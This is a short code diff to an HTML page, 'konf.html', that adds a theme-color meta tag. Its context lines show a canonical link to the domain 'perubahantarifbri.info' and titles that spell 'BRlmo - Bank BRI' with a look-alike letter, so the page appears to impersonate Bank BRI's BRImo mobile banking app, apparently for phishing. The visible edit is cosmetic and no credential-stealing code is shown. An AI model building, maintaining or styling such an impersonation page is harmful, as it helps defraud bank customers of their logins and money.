--- a/konf.html
+++ b/konf.html
@@ -7,6 +7,7 @@
     <link rel="canonical" href="https://perubahantarifbri.info/-brimo" />
     <meta name="twitter:card" content="summary_large_image" />
     <meta property="og:title" content="BRlmo - Bank BRI" />
+    <meta name="theme-color" content="#0f78cb">
     <meta name="twitter:title" content="BRlmo - Bank BRI" />
     <meta property="og:site_name" content="BRImo" />
     <meta name="twitter:site_name" content="BRImo" />
